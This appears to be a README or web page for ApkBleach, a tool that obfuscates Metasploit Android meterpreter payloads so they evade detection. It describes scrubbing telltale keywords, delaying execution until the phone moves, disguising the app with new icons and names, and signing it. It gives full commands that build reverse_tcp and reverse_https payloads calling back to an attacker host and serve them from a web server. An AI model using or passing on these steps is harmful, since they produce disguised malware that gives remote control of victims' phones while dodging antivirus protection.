ApkBleach Android Payload Obfuscation Tool
ApkBleach Android Payload Obfuscation Tool

ApkBleach: Android Payload Obfuscation Tool

ApkBleach was developed specifically to obfuscate android payloads generated by the metasploit-framework in attempts to evade detection. The obfuscation that takes place attempts to evade detection with two main methods. The first method is strictly for screening of the decompiled payload. By default metasploit generates a android application littered with the keywords metasploit and payload. Replacing those keywords with random strings and randomizing file names is good first step in obfuscating the typical metasploit android payload. The next method is to change the way the payload is executed. The default payload generated by metasploit executes on create or simply put as soon as the application is opened.

This obfuscation method uses the devices accelerometer activity to launch the payload. So the apkbleach payload will wait for physical movement of the target device before executing the payload.

This software also automates the process of changing the app icon, changing the app name, signing the apk, aligning the apk and installing or upgrading apktool.

ApkBleach Interface
ApkBleach Interface

New Deployment UI feature

Deployment UI by ApkBleach
Deployment UI by ApkBleach


  1. User interface for deployment of payloads
  2. Line by line permissions editing. The software will go through each permission in the manifest and ask if you want to delete it.
  3. Stealth option. This executes the payload off the devices accelerometer instead of on open. This option also allows you to choose how many sessions you want spawned of exploit.
  4. Custom icon injection. This allows users to modify the app icon that appears on the home screen of a android device. You can choose from a icon apkbleach provides or you can supply your own. Apkbleach will do all the work for you.
  5. Renames the application to the name you put chose as the ouput file
  6. Scrubs the entire application of any mentions of the name “metasploit” , “stage” or “payload”. There are a lot by the way. sending security testing with an app that contains the name metasploit is just funny 🙂
  7. Adds padnops to PAYLOAD
  8. Signs apk with jarsigner. msfenom produces unsigned apps
  9. Zip aligns apk
  10. Apktool upgrade feature. If the software detects youre using apktool version 2.4.1-dirty which is Kali’s package maintainers version it will ask if you want to replace it with the lates version frfom ibot peaches. This is a good idea because it conflicts with the msfvenom -x option and throws a version number error. Not to mention the problems it has given users in the past.


apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk

apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all

 apkbleach --list-payloads

 apkbleach --list-icons

 apkbleach --clear-cache

optional arguments:

  -h, --help            show this help message and exit

                    Generates a payload
  -s [number of sessions to spawn 1-5]
                    Executes payload on accelerometer activity instead of on open
  -i [BLEACH_icon..] or [path/to/custom/icon]
                    Injects an icon
  -o [output/path/for/file.apk]
                    Path to output apk
  --edit-permissions    Enables permission editing in apk's manifest
  --deploy-all          Deploys each available icon as a payload with the apache2 server with a web interface

  --list-payloads       List available icons

  --list-icons          List available icons

  --clear-cache         Allows prompt whether to keep package maintainers version apktool


Install instructions:

After cloning or downloading the repository cd into the apkbleach directory and run run install.sh

cd apkbleach
bash install.sh


cd apkbleach
chmod +x install.sh

Demo Video